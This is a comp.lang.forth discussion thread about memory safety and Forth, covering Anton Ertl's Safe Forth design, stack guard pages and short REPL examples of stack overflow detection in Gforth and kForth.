push for memory safe languages -- impact on Forth

What if the program writes a float to a byte location?

Do we have to go along and make Forth type-safe then?

-marcel

Krishna Myneni

2024-03-01 16:53:57 UTC

Post by mhx
What if the program writes a float to a byte location?
Do we have to go along and make Forth type-safe then?

We don't have to go along with anything. However, it might be useful to
consider how we can satisfy some of the concerns. It is not possible to
separate entirely memory safe from type safe, since an array of bytes
doesn't have the same memory bounds as an array of floats. Nevertheless
index checking would be the same in both cases.

--
Krishna

Anton Ertl

2024-03-01 18:02:10 UTC

Post by mhx
What if the program writes a float to a byte location?

That's not a safety problem (as long as the location is big enough for
the float), so one can design a Safe Forth variant that allows that.
But once you are already implementing all the Safety features, it's
relatively easy to prevent that, too. But of course, if you find that
you need that, you can add a word that does that without subverting
memory safety.

Post by mhx
Do we have to go along and make Forth type-safe then?

For memory safety, you certainly need a way to differentiate between
addresses and other data. Some programming languages use type
checkers for that, some use tagging. Safe Forth uses separate stacks.

- anton

--
M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
New standard: https://forth-standard.org/
EuroForth 2023: https://euro.theforth.net/2023

Tristan Wibberley

2024-03-04 23:03:55 UTC

Post by mhx
What if the program writes a float to a byte location?

That's not a safety problem (as long as the location is big enough for
the float), so one can design a Safe Forth variant that allows that.

I'm not very familiar with forth yet, does this refer to writing to a
machine addressed location? If so, plenty of computers have alignment
requirements, a DoS can be introduced by the above action.

Also, if you write a byte to a float location, a variety of problems can
be introduced including running trap callbacks that were insufficiently
tested for the new program state, etc, killing the process and running
restart sequences where less volatile state can now be in an unusual
condition and new side-effects induced, and so on.

memory safety means maintaining invariant relations wrt. each memory
location.

Anton Ertl

2024-03-05 06:35:40 UTC

Post by Tristan Wibberley

Post by mhx
What if the program writes a float to a byte location?

That's not a safety problem (as long as the location is big enough for
the float), so one can design a Safe Forth variant that allows that.

I'm not very familiar with forth yet, does this refer to writing to a
machine addressed location?

Yes.

Post by Tristan Wibberley
If so, plenty of computers have alignment
requirements,

In general-purpose computers, that used to be the case in the 1990s,
but nowadays it is no longer the case. We have to use really old
hardware to test against alignment errors, and even on hardware that
has alignment requirements (like our 21264B machine from 2000), the OS
(Linux) emulates the behaviour of computers without these requirements
when the program performs an unaligned access, and I had to write a
special program to get signals for unaligned accesses
<https://www.complang.tuwien.ac.at/anton/uace.c>. And while the Linux
command setarch can turn on various compatibility features for old
programs, such as turning off ASLR, it does not include a feature for
making unaligned accesses trap on the appropriate hardware.

In any case, if we want to avoid unaligned FP accesses, one can design
a memory-safe Forth dialect such that it prevents unaligned FP
accesses, but not accessing the same memory as bytes and as FP values.

However, despite all that, my plan is to design Safe Forth in a way
where the commonly-used words do not support such kinds of accesses,
because the result will make most programming tasks easier. For
specialized uses there may be words that just treat the memory as
bytes, though.

Post by Tristan Wibberley
a DoS can be introduced by the above action.

DoS and more serious vulnerabilities can be introduced in lots of ways
in memory-safe programming languages, whether some mechanism prevents
writing floats to a byte location or not.

However, I should refine my sentence above to: "That's not a
memory-safety problem ...".

Post by Tristan Wibberley
Also, if you write a byte to a float location, a variety of problems can
be introduced including running trap callbacks that were insufficiently
tested for the new program state, etc, killing the process and running
restart sequences where less volatile state can now be in an unusual
condition and new side-effects induced, and so on.

Memory safety does not guarantee bug-freedom.

However, what you write appears to be a case of "Bedenkentraeger",
imagining all kinds of possible or impossible problems in order to
argue against something. In the present case, impossible problems:

In Gforth no floating-point operation traps, and I intend to keep that
behaviour for Safe Forth.

There is also no way to write "trap callbacks". If there was, and a
programmer used it, and it was insufficiently tested, the problem
would be that the code was insufficiently tested, not in writing the
byte to an address where later an FP value is read from.

Because there is no trap and no trap callback, the process is not
killed, and no restart sequence is run. If it was, the condition of
process-surviving state would be something that would have to be made
safe whether the system prevents accessing bytes and FP values at the
same addresses or not.

Post by Tristan Wibberley
memory safety means maintaining invariant relations wrt. each memory
location.

So?

- anton

Tristan Wibberley

2024-03-05 07:58:20 UTC

...

Post by Tristan Wibberley
If so, plenty of computers have alignment
requirements,

In general-purpose computers, that used to be the case in the 1990s,
but nowadays it is no longer the case. We have to use really old
hardware to test against alignment errors. ...

Or special purpose computers that are not mass marketed, but I wasn't
aware they'd fixed all the public market computers. Thanks for the info.

minforth

2024-03-05 14:03:46 UTC

Post by Tristan Wibberley
....

Post by Tristan Wibberley
If so, plenty of computers have alignment
requirements,

In general-purpose computers, that used to be the case in the 1990s,
but nowadays it is no longer the case. We have to use really old
hardware to test against alignment errors. ...

Or special purpose computers that are not mass marketed, but I wasn't
aware they'd fixed all the public market computers. Thanks for the info.

You are still in for some nasty surprises with "public market" ARM CPUs.
f.ex.
https://developer.arm.com/documentation/den0013/d/Porting/Alignment

Hans Bezemer

2024-03-05 14:03:27 UTC

Post by Tristan Wibberley

Post by mhx
What if the program writes a float to a byte location?

That's not a safety problem (as long as the location is big enough for
the float), so one can design a Safe Forth variant that allows that.

I'm not very familiar with forth yet, does this refer to writing to a
machine addressed location? If so, plenty of computers have alignment
requirements, a DoS can be introduced by the above action.
Also, if you write a byte to a float location, a variety of problems can
be introduced including running trap callbacks that were insufficiently
tested for the new program state, etc, killing the process and running
restart sequences where less volatile state can now be in an unusual
condition and new side-effects induced, and so on.
memory safety means maintaining invariant relations wrt. each memory
location.

This entire discussion really made me laugh. How sentiments change..
I can remember when I wrote 4tH people were dismissing it, because of
its safety features: "This is not Forth".

But 4tH addresses most of the issues at hand. You cannot write a float
on a character, because those reside in different segments. You cannot
overwrite execution code - because that not only resides in a different
segment, but it's also "read only".

If your execution pointer goes outside the code segment, the program
simply stops. If you do a MOVE - any MOVE - it will check the bounds
before going at it at C speed.

Now - I won't say you can't do any damage. It doesn't do any array
bounds checking, so a string can spill into another string. But it will
not spill outside its segment. If you use a random integer value as a
pointer, it will be okay to corrupt anything inside that segment, but
not *OUTSIDE* that segment. And frankly, that's all the safety I need.

If you think you will revive Forth by jumping on that Rust bandwagon, I
think you're wrong. You won't attract a new audience and you won't get
the acceptance you crave for. First and foremost, because I think Rust
is the wrong idea. It's been tried before - Ada, Pascal, Java - in some
sense: BASIC.

Good programmers exist because they are good programmers. Bad programs
exist because of bad programmers. Let me quote one of the foremost CS
scientists who ever lived:

"Ada will not meet its major objective, viz. that of reducing software
costs by standardization, and it will not be the vehicle for programs we
can rely upon, for it is so complicated that it defies the unambiguous
definition that is essential for these purposes. Long before the design
was frozen, computing scientists from all over the world have given
plenty of warning but the political body in question preferred to ignore
these warnings and to decide on a design that cannot be salvaged. From a
scientific point of view all further attention paid to Ada is a waste of
effort. But the sheer buying-power of the DoD makes Ada an undeniable
reality, which in combination with DARPA's policies for the funding of
software research can only increase the pressure to spend research
effort on the wrong problems.

Another series of stones in the form of "programming tools" is produced
under the banner of "software engineering", which, as time went by, has
sought to replace intellectual discipline by management discipline to
the extent that it has now accepted as its charter "How to program if
you cannot."

Let that sink in: "It will not be the vehicle for programs we can rely
upon, for it is so complicated that it defies the unambiguous definition
that is essential for these purposes". That is the very definition of Rust.

All the time you're spending getting your code to compile, you're not
creating programs. I'd say that's the reverse of productivity. The
higher the abstraction, the more difficult it is to understand - let
alone to teach.

Compare "pointer" to "a variable containing an address", the beauty of
"an object" to "a structure with a few function pointer fields" and a
bunch of syntactic sugar (i.e. object.method vs. method(object)).

Lifetimes? Borrowing? Are you kidding me? After programming in Forth for
over 30 years now, I'm slowly getting why I get things done in Forth
that I would never have imagined to tackle in C. Forth has some
remarkable principles. The stack is one of them. The principle "execute,
throw on the stack or throw an error" is another one. The dictionary,
consisting of a function pointer and a string is another one.

Simple principles, simple to grasp, but very powerful - especially when
combined. ColorForth added a few more, BTW.

I tend to trust my Forth programs a lot more than my C ones, for the
simple reason that there were a million (stack) errors I could have made
along the way - every single one of them capable of turning my beautiful
program into a steaming pile of dung.

So, safety, yes. I like that very much. I ventured into that very early
and I never regretted it. But apart from some basic checks it should
stop at the point where I have to convince a compiler that I know what
I'm doing.

Hans Bezemer

Hans Bezemer

2024-03-05 14:04:21 UTC

Post by Tristan Wibberley

Post by mhx
What if the program writes a float to a byte location?

That's not a safety problem (as long as the location is big enough for
the float), so one can design a Safe Forth variant that allows that.

I'm not very familiar with forth yet, does this refer to writing to a
machine addressed location? If so, plenty of computers have alignment
requirements, a DoS can be introduced by the above action.
Also, if you write a byte to a float location, a variety of problems can
be introduced including running trap callbacks that were insufficiently
tested for the new program state, etc, killing the process and running
restart sequences where less volatile state can now be in an unusual
condition and new side-effects induced, and so on.
memory safety means maintaining invariant relations wrt. each memory
location.

minforth

2024-03-05 18:32:03 UTC

Post by Hans Bezemer
I tend to trust my Forth programs a lot more than my C ones

Maybe you're a lousy, careless C programmer? (pun intended ;-))

But I agree with you that the world doesn't need a Safe Forth.

Still, everyone has their favourite baby (like you have your 4th)
and you can still learn a few things while exploring additional
security features and enjoy it for the intellectual exercise, as
Anton seems to be doing with gforth.

By the way, I don't want to go off on a tangent here. I use
security features myself (not in MinForth though), because the
cost of repairing faulty devices in remote locations are too high
to be careless.

The solution is a separate DSL (on top of a Forth nucleus) that
does not allow any direct memory access. Very simple sandboxing.

Paul Rubin

2024-03-05 18:40:09 UTC

Post by Hans Bezemer
If you think you will revive Forth by jumping on that Rust bandwagon,
I think you're wrong.

Probably true, Forth users want something different than what Rust aims
to supply.

Post by Hans Bezemer
First and foremost, because I think Rust is the wrong idea. It's been
tried before - Ada, Pascal, Java - in some sense: BASIC.

BASIC's heyday was before my time, but it was very popular in a certain
crowd. Java was extremely successful in industry and I think it was at
the top of TIOBE for a while (it is #4 now). #1 is currently Python
which can be seen as a successor to BASIC. Pascal was intentionally
limited (it was intended as an instructional language) and yet it had
its own era of popularity because of Turbo Pascal and the P-system.

Ada was overcomplicated, but I think it also didn't gain traction
because the early Ada compilers were slow and expensive. If GNAT had
been available from the beginning, Ada would have gotten more use, imho.

Post by Hans Bezemer
Good programmers exist because they are good programmers. Bad programs
exist because of bad programmers.

The best programmers I know have released code with memory errors, so at
a certain point you have to stop blaming the human for being less
accurate than a machine.

Post by Hans Bezemer
"Ada will not meet its major objective... for it is so complicated
that it defies the unambiguous definition that is essential for these
purposes.

It's not particularly more complicated than C++ as far as I can tell,
and C++ is currently #3 on TIOBE.

Post by Hans Bezemer
"...for it is so complicated...". That is the very definition of Rust.
All the time you're spending getting your code to compile, you're not
creating programs.

Would you say the same of time you spend fixing bugs that you find
during testing?

Post by Hans Bezemer
I'd say that's the reverse of productivity. The higher the
abstraction, the more difficult it is to understand - let alone to
teach.

Picking the right level of abstraction to handle a problem is an
important skill in programming just like it is in math. We spend a lot
of time studying abstractions in math because they are useful. That
turns out to be true in programming as well.

Post by Hans Bezemer
Lifetimes? Borrowing? Are you kidding me?

This is just the language handling and checking an abstraction that
people have been doing manually long before Rust. If you look at the
CPython implementation, it does memory management by reference counting,
and it constantly uses the ideas of borrowed references internally.

I would say today though, most application programmers don't need Rust.
They will be more productive with garbage collected languages, at the
expense of some machine resources. Rust is for when those resources
can't be spared.

Post by Hans Bezemer
So, safety, yes. I like that very much. I ventured into that very
early and I never regretted it. But apart from some basic checks it
should stop at the point where I have to convince a compiler that I
know what I'm doing.

I see it the other way. If the compiler can find every error in my
program of type X, then simply fixing the program until the compiler
accepts it means I get a program that is free of that type of error.
That increases my confidence in the program. The trade-off is that such
features can make the language and the compiler harder to use. A big
part of research in languages is widening the classes of errors that the
compiler can check without the language becoming too difficult.

dxf

2024-03-02 00:45:37 UTC

Post by mhx
What if the program writes a float to a byte location?

Coincidentally I just received a report from user attempting to do
exactly that (it was a cell, not a byte). Apparently his code worked
on Gforth and concluded DX-Forth was buggy. Sigh - if only all bugs
were this easy :)

minforth

2024-03-01 17:42:08 UTC

Forth by design is as unsafe as any assembler.
The only way to tame it is to run it in a black box.

Krishna Myneni

2024-03-01 18:42:31 UTC

Forth by design is as unsafe as any assembler. The only way to tame it
is to run it in a black box.

We may have an alternative, when necessary. The malleability of the
language lends itself to interfaces which can enforce memory safety.
Even without changes to the language itself, memory safety might be
provided by a library e.g. typed arrays, as long as one sticks to the
designed interface.

--
Krishna

minforth

2024-03-01 19:46:55 UTC

IMO you would just be creating another stack language, even if it just
looks like another Forth dialect from the outside.

If I need a relatively safe programming language, I would use SPARK.

Anton Ertl

2024-03-01 17:38:02 UTC

Post by Krishna Myneni
I'm wondering what the CS Forth users and Forth systems developers make
of the renewed recent push for use of memory-safe languages.

Which "renewed recent push" do you mean?

Post by Krishna Myneni
Certainly
Forth can add the type of contractual safety requirements e.g.,
implementing bounds checking, of a "memory-safe language". Do we need to
work on libraries for these provisions?

Some years ago I thought that we can make do by providing some kind of
secure dialect of standard Forth (with some additional words, and an
escape hatch to full Forth) [ertl-secure16]. But the secure dialect
was not intended to be watertight, only protect against mistakes.

In the meantime, I know more about the topic and think that it's
better to produce a watertight secure dialect (with an escape hatch).
Other people have been earlier in recognizing that and have created
Forth systems like Oforth or Eight. My own contribution to that
topic, Safe Forth [ertl22] is a paper design for now, but has the
selling point of requiring neither type tagging nor static type
checking.

I have not had any resonance wrt what I proposed in 2016. For my 2022
ideas, I have had one request on whether there already exists an
implementation.

@InProceedings{ertl-secure16,
author = {M. Anton Ertl},
title = {Security},
crossref = {euroforth16},
pages = {82--83},
url = {http://www.euroforth.org/ef16/papers/ertl-secure.pdf},
video = {https://wiki.forth-ev.de/lib/exe/fetch.php/events:security.mp4},
OPTnote = {presentation slides}
}
@Proceedings{euroforth16,
title = {32nd EuroForth Conference},
booktitle = {32nd EuroForth Conference},
year = {2016},
key = {EuroForth'16},
url = {http://www.complang.tuwien.ac.at/anton/euroforth/ef16/papers/proceedings.pdf}
}

@InProceedings{ertl22,
author = {M. Anton Ertl},
title = {Memory Safety Without Tagging nor Static Type Checking},
crossref = {euroforth22},
pages = {5--15},
url = {http://www.euroforth.org/ef22/papers/ertl.pdf},
url-slides = {http://www.euroforth.org/ef22/papers/ertl-slides.pdf},
video =

OPTnote = {refereed},
abstract = {A significant proportion of vulnerabilities are due
to memory accesses (typically in C code) that
memory-safe languages like Java prevent. This paper
discusses a new approach to modifying Forth for
memory-safety: Eliminate addresses from the data
stack; instead, put object references on a separate
object stack and use \code{value}-flavoured words.
This approach avoids the complexity of static type
checking (used in, e.g., Java and Factor), and also
avoids the performance overhead of dynamic type
checking for non-memory operations. This paper
discusses the consequences of this approach on the
language, and on performance.}
}

- anton

Paul Rubin

2024-03-01 18:17:36 UTC

Post by Krishna Myneni
of the renewed recent push for use of memory-safe languages.

Which "renewed recent push" do you mean?

Krishna Myneni

2024-03-01 21:47:42 UTC

Post by Krishna Myneni
of the renewed recent push for use of memory-safe languages.

Which "renewed recent push" do you mean?

From the second link,

"While memory safe hardware and formal methods can be excellent
complementary approaches to mitigating undiscovered vulnerabilities, one
of the most impactful actions software and hardware manufacturers can
take is adopting memory safe programming languages. They offer a way to
eliminate, not just mitigate, entire bug classes. This is a remarkable
opportunity for the technical community to improve the cybersecurity of
the entire digital ecosystem."

It sounds like there are plans to use Rust for some of the Linux kernel
code.

--
KM

dxf

2024-03-02 06:02:27 UTC

Post by Krishna Myneni
of the renewed recent push for use of memory-safe languages.

Which "renewed recent push" do you mean?

It's good to have an application that works as planned but how does one
that misbehaves translate to 'security risk' and how does 'memory-safe'
prevent that?

"ONCD has the belief that better metrics enable technology providers to
better plan, anticipate, and mitigate vulnerabilities before they become
a problem."

That may be their belief (fancy word for hope) but do they have anything
to back it up?

a***@spenarnc.xs4all.nl

2024-03-02 09:47:18 UTC

Post by Krishna Myneni
of the renewed recent push for use of memory-safe languages.

Which "renewed recent push" do you mean?

https://www.tomshardware.com/software/security-software/white-house-urges-developers-to-avoid-c-and-c-use-memory-safe-programming-languages
https://www.whitehouse.gov/oncd/briefing-room/2024/02/26/press-release-technical-report/
It's good to have an application that works as planned but how does one
that misbehaves translate to 'security risk' and how does 'memory-safe'
prevent that?
"ONCD has the belief that better metrics enable technology providers to
better plan, anticipate, and mitigate vulnerabilities before they become
a problem."
That may be their belief (fancy word for hope) but do they have anything
to back it up?

Most Forthers have a blind spot what safe means.
I grew up with algol60. The only errors you encountered were
array index errors, and memory exhausted. Index errors showed what array
the index, and a call tree. Memory exhausted indicates that you have
infinite recursion.
On the other hand FORTRAN programs showed an hex address and a dump of
the internal registers.

Groetjes Albert

--
Don't praise the day before the evening. One swallow doesn't make spring.
You must not say "hey" before you have crossed the bridge. Don't sell the
hide of the bear until you shot it. Better one bird in the hand than ten in
the air. First gain is a cat purring. - the Wise from Antrim -

dxf

2024-03-03 03:20:49 UTC

Post by a***@spenarnc.xs4all.nl

Post by Krishna Myneni
of the renewed recent push for use of memory-safe languages.

Which "renewed recent push" do you mean?

Blind is believing one doesn't have to think because the system has one's
back. Forth is brutal in dispelling any such notions.

Krishna Myneni

2024-03-02 14:35:25 UTC

Post by Krishna Myneni
of the renewed recent push for use of memory-safe languages.

Which "renewed recent push" do you mean?

It's good to have an application that works as planned but how does one
that misbehaves translate to 'security risk' and how does 'memory-safe'
prevent that?

See my example in C where a buffer overflow is exploited to run code
which would not ever be called for normal execution.

Also, see Anton's example in Gforth.

--
Krishna

minforth

2024-03-02 15:39:11 UTC

Harden these without runtime checks:
: RT1 2 3e recurse ;
: RT2 drop fdrop recurse ;

Krishna Myneni

2024-03-02 16:08:53 UTC

Post by minforth
: RT1 2 3e recurse ;
: RT2 drop fdrop recurse ;

Let's see what python does:

def rt1():
return rt1()

rt1()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<stdin>", line 2, in rt1
File "<stdin>", line 2, in rt1
File "<stdin>", line 2, in rt1
[Previous line repeated 996 more times]
RecursionError: maximum recursion depth exceeded

Clearly it is doing a runtime check. Similarly one could have RECURSE in
Forth perform a runtime check to enforce a recursion depth limit, and
indeed this type of error is caught by several Forth systems:

=== kForth example ===
: rt1 recurse ;
ok
rt1
Line 2: VM Error(-258): Return stack corrupt
rt1
=== end example ===

=== Gforth example ===
: rt1 recurse ; ok
rt1
*the terminal*:2:1: error: Return stack overflow

rt1<<<

=== end example ===

--
Krishna

Krishna Myneni

2024-03-02 16:17:57 UTC

Post by minforth
: RT1 2 3e recurse ;
: RT2 drop fdrop recurse ;

return rt1()
rt1()
File "<stdin>", line 1, in <module>
File "<stdin>", line 2, in rt1
File "<stdin>", line 2, in rt1
File "<stdin>", line 2, in rt1
[Previous line repeated 996 more times]
RecursionError: maximum recursion depth exceeded
Clearly it is doing a runtime check. Similarly one could have RECURSE in
Forth perform a runtime check to enforce a recursion depth limit, and
=== kForth example ===
: rt1 recurse ;
ok
rt1
Line 2: VM Error(-258): Return stack corrupt
rt1
=== end example ===
=== Gforth example ===
: rt1 recurse ; ok
rt1
*the terminal*:2:1: error: Return stack overflow

rt1<<<

=== end example ===

To be clear, if you try to fill up the fp or data stack, as with your
rt1 example, kForth does give a segfault (and hence is susceptible to an
exploit), while Gforth still gives the same error.

--
Krishna

Anton Ertl

2024-03-02 16:43:10 UTC

Post by Krishna Myneni
=== Gforth example ===
: rt1 recurse ;Â ok
rt1
*the terminal*:2:1: error: Return stack overflow

rt1<<<

=== end example ===

To be clear, if you try to fill up the fp or data stack, as with your
rt1 example, kForth does give a segfault (and hence is susceptible to an
exploit), while Gforth still gives the same error.

In Gforth on a Unix system, Unix produces a SIGSEGV when a stack runs
into a guard page. The signal handler then looks at the offending
address, and guesses that an access close to the bottom of a stack is
an underflow of that stack, and correspondingly for accesses close to
the top of a stack. This can be seen as follows:

With the gforth engine with the FP stack being empty:

fp@ 32769 - c@
*the terminal*:3:13: error: Floating-point stack overflow
fp@ 32769 - >>>c@<<<
fp@ 1+ c@
*the terminal*:4:8: error: Floating-point stack underflow
fp@ 1+ >>>c@<<<

- anton

Krishna Myneni

2024-03-02 17:18:14 UTC

Post by Krishna Myneni
=== Gforth example ===
: rt1 recurse ; ok
rt1
*the terminal*:2:1: error: Return stack overflow

rt1<<<

=== end example ===

To be clear, if you try to fill up the fp or data stack, as with your
rt1 example, kForth does give a segfault (and hence is susceptible to an
exploit), while Gforth still gives the same error.

Nice. The use of guard pages is something I need to look into to avoid
memory leaks or corruption for the stacks. Does this mean Gforth is
immune to arbitrary code execution attacks for the fp and data stack
overflow and underflow conditions?

--
Krishna

Anton Ertl

2024-03-02 18:03:32 UTC

Post by Krishna Myneni
Does this mean Gforth is
immune to arbitrary code execution attacks for the fp and data stack
overflow and underflow conditions?

Technically, one might answer "yes", but there are stack depth
violations that don't result in a stack overflow or underflow, and
that can lead to arbitrary code execution in Gforth. A simple example
is:

: bla ." bla" ;

: foo >r ;

' bla >body foo \ prints "bla"

Essentially, there is far too few guardrails in Gforth for the guard
pages to provide significant safety. For Gforth they are just a
convenience feature.

However, the idea of Safe Forth is to eliminate all these other ways
towards arbitrary code execution, and in Safe Forth the guard pages
will close the hole that stack overflows and underflows would
otherwise leave open.

Note that guard pages require OS support; Gforth uses the mprotect()
system call (of modern (since ~1990) Unix systems) for that.

- anton

Krishna Myneni

2024-03-02 23:07:02 UTC

Post by Krishna Myneni
=== Gforth example ===
: rt1 recurse ; ok
rt1
*the terminal*:2:1: error: Return stack overflow

rt1<<<

=== end example ===

To be clear, if you try to fill up the fp or data stack, as with your
rt1 example, kForth does give a segfault (and hence is susceptible to an
exploit), while Gforth still gives the same error.

In the version of Gforth which I have (0.7.9_20220120),

fp@ 32769 - c@
*the terminal*:5:13: error: Floating-point stack overflow
fp@ 32769 - >>>c@<<<

However,

fp@ 65536 - c@ ok 1

and, worse,

1 fp@ 65536 - c! ok

So the guard pages are not a solution to pointer arithmetic bugs with
the stack pointers.

To make stack access memory safe, there has to be bounds checks on
reading and writing from/to stacks. This suggests that stacks should be
arrays and stack operations always involve array read/write from arrays
with enforced bounds checking e.g. something like

: DUP STACK[ tos ]@ ; \ TOS returns an index to the top of the stack
: OVER STACK[ tos 1+ ]@ ;

etc. and ]@ and ]! performs bounds checks.

I haven't yet looked at your paper on SafeForth.

--
Krishna

Anton Ertl

2024-03-03 07:25:20 UTC

Post by Anton Ertl
*the terminal*:3:13: error: Floating-point stack overflow
*the terminal*:4:8: error: Floating-point stack underflow

In the version of Gforth which I have (0.7.9_20220120),
*the terminal*:5:13: error: Floating-point stack overflow
However,
and, worse,
So the guard pages are not a solution to pointer arithmetic bugs with
the stack pointers.

Yes, that is not their intention and not the intention of these
examples. The intention of these examples is to show that any memory
access will be interpreted as a stack underflow or overflow if it is
to a certain range of addresses.

A more serious issue is that, as implemented in Gforth (in particular,
gforth-fast), stack underflows can be undetected in some cases: On
Gforth on an AMD64 system, with the data stack being empty:

600 pick ok 1

On gforth-fast, with the data stack being empty:

: foo 600 0 ?do nip loop cr . ; foo
0
*the terminal*:1:33: error: Stack underflow
: foo 600 0 ?do nip loop cr . ; >>>foo<<<
Backtrace:
kernel/basics.fs:312:27: 0 $7F30E3BDFE10 throw

Note that FOO actually performs the "cr .", so the stack underflow is
not detected by an access to the the guard page. Instead, the text
interpreter checks the stack pointer and reports a stack underflow.
The non-detection of the stack underflow is because NIP is implemented
as:

$7F30E3C72C90 nip 1->1
7F30E3917557: add r13,$08 #update sp

With the gforth engine, a similar scenario (involving DROP) is avoided
because in this engine DROP loads the value being dropped exactly to
trigger stack underflow reports where they happen:

$7F55EBFA6C98 drop 0->0
7F55EBAC51C0: mov $50[r13],r15 #save ip (for accurate backtraces)
7F55EBAC51C4: add r15,$08 #update ip
7F55EBAC51C8: mov rax,[r14] #load dropped value
7F55EBAC51CB: add r14,$08 #update sp

Neither the deep PICK nor the loop that just NIPs or DROPs occur in
practice.

The motivation for the otherwise unnecessary load in DROP (in gforth)
is code sequences like

drop 1

in cases where the stack is empty. The load in DROP results in
detecting the stack underflow at the DROP rather than at the "1".
Reporting a stack underflow at an operation that just pushes can
produce a WTF moment in the programmer; the gforth engine exists to
make debugging easier, and that includes avoiding such moments.

Post by Krishna Myneni
To make stack access memory safe, there has to be bounds checks on
reading and writing from/to stacks. This suggests that stacks should be
arrays and stack operations always involve array read/write from arrays
with enforced bounds checking e.g. something like

With guard pages, that's not necessary. The normal bounded-depth
stack accesses (of words like 2DROP or 2OVER) are sure to hit the
guard pages if the stack is out-of-bounds; you may want to perform an
otherwise unnecessary load on words like NIP, DROP, 2DROP etc. that do
not otherwise use (and thus load) the stack values that they consume,
but that's much cheaper than putting bounds checks on every stack
access. For unbounded stack-access words like PICK, a bounds check is
appropriate.

- anton

minforth

2024-03-03 08:21:30 UTC

You can run around in circles here, the basic problem is that there is
no formal specification for what a safe programming language is.
Analyses on the subject are dominated by the following: Memory errors,
type errors, range errors, race condition errors.

In order to develop Forth more in this direction, we would first need
a specification on "Hardened Forth" that is dedicated to these error
areas - and also marks UBs with defined exception codes. Ideally
accompanied by a test suite so that every Forth system developer can
check their own system.

Krishna Myneni

2024-03-03 13:07:07 UTC

Post by minforth
You can run around in circles here, the basic problem is that there is
no formal specification for what a safe programming language is.
Analyses on the subject are dominated by the following: Memory errors,
type errors, range errors, race condition errors.
In order to develop Forth more in this direction, we would first need
a specification on "Hardened Forth" that is dedicated to these error
areas - and also marks UBs with defined exception codes. Ideally
accompanied by a test suite so that every Forth system developer can
check their own system.

I'm not smart enough for a top down approach to this problem. The Forth
approach is one that I can take though. Start with small well-defined
problems, and try to find solutions for those. Build up a bigger picture
from those solutions.

--
Krishna

minforth

2024-03-03 16:08:26 UTC

That's patchwork, but if it is sufficient for a program,
good for the program. As for language safety....

For instance, I wouldn't define how to react on
0 BASE !
that could lead to a plethora of system-dependent crashes.
Or on
-1. 3 UM/MOD
probably throw exception code -11 for result out of range
even when 'range' is undeclared or only implicit.

OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.

Krishna Myneni

2024-03-03 23:02:44 UTC

Post by minforth
That's patchwork, but if it is sufficient for a program,
good for the program. As for language safety....

...

Post by minforth
OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.

Perhaps not, but I wrote my Forth system to provide some hand-holding,
primarily for my own needs. My expectation is that the demand for Forth
systems which don't address safety concerns will rapidly drop to zero.

--
Krishna

minforth

2024-03-04 07:52:28 UTC

Post by minforth
OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.

IIRC there have been a few Forth applications at NASA and for astronomy
(e.g. see Forth Inc. web site). I've already wondered how much convincing
had to be done for NASA not to disqualify Forth.

Krishna Myneni

2024-03-04 13:06:38 UTC

Post by minforth
OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.

Perhaps not, but I wrote my Forth system to provide some hand-holding,
primarily for my own needs. My expectation is that the demand for
Forth systems which don't address safety concerns will rapidly drop to
zero.

IIRC there have been a few Forth applications at NASA and for astronomy
(e.g. see Forth Inc. web site). I've already wondered how much convincing
had to be done for NASA not to disqualify Forth.

The trend has been to go to "memory-safe" languages. There are many
instances in which simple run-time type checking for addresses have
resulted in saving me considerable debugging time -- usually just stack
order is incorrect, but the error can manifest in more complex ways as well.

I don't have any particular insight into the trends other than following
the news. I think there will be even greater pressure going forward to
use memory-safe languages for internet facing applications. The shift in
academia towards those languages appears to have already happened. My
daughter's first year CS class uses python.

--
Krishna

minforth

2024-03-04 14:20:09 UTC

Post by minforth
OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.

Perhaps not, but I wrote my Forth system to provide some hand-holding,
primarily for my own needs. My expectation is that the demand for
Forth systems which don't address safety concerns will rapidly drop to
zero.

IIRC there have been a few Forth applications at NASA and for astronomy
(e.g. see Forth Inc. web site). I've already wondered how much convincing
had to be done for NASA not to disqualify Forth.

The trend has been to go to "memory-safe" languages. There are many
instances in which simple run-time type checking for addresses have
resulted in saving me considerable debugging time -- usually just stack
order is incorrect, but the error can manifest in more complex ways as well.
I don't have any particular insight into the trends other than following
the news. I think there will be even greater pressure going forward to
use memory-safe languages for internet facing applications. The shift in
academia towards those languages appears to have already happened.

This is why web assembly is on the rise. Many languages can already be
compiled to wasm. See
https://webassembly.org/docs/security/

However, I found only a few wasm-based Forths on the net.

Paul Rubin

2024-03-04 20:17:12 UTC

Post by minforth
IIRC there have been a few Forth applications at NASA and for astronomy
(e.g. see Forth Inc. web site).

I wonder if any of those applications were written in the current
century.

Anton Ertl

2024-03-03 16:14:27 UTC

Post by minforth
You can run around in circles here, the basic problem is that there is
no formal specification for what a safe programming language is.

It was certainly an interesting aspect of my work on Safe Forth that I
first had to understand better what memory safety is; I had the "I
know it when I see it" kind of understanding, but that was not enough.
But I succeeded in understanding it better, and you can read the paper
if you want to know more about it.

Post by minforth
Analyses on the subject are dominated by the following: Memory errors,
type errors, range errors, race condition errors.

Safe Forth only tries to solve memory errors. That makes it necessary
to deal with some type errors and some range errors, but not all of
them, and there are no ambitions at the moment to harden Safe Forth
more against those. My idea on how to perform multitasking in Safe
Forth does not provide shared memory, so there are no race conditions.

Post by minforth
In order to develop Forth more in this direction, we would first need
a specification on "Hardened Forth" that is dedicated to these error
areas - and also marks UBs with defined exception codes.

I know "UB" from the C language lawyers. They love the concept of
"undefined behaviour" so much that they have created a 2-letter
acronym for it. A safe language does not have undefined behaviour,
and if you define the behaviour on some kind of condition to perform
an exception, that behaviour is certainly not undefined.

- anton

minforth

2024-03-03 19:56:44 UTC

Don't look elsewhere for UBs, the Forth Standard is shock full of "ambiguous conditions"

Paul Rubin

2024-03-03 19:32:46 UTC

Post by minforth
You can run around in circles here, the basic problem is that there is
no formal specification for what a safe programming language is.

From https://en.wikipedia.org/wiki/Ada_(programming_language)#History :

HOLWG crafted the Steelman language requirements, a series of
documents stating the requirements they felt a programming language
should satisfy. Many existing languages were formally reviewed, but
the team concluded in 1977 that no existing language met the
specifications.

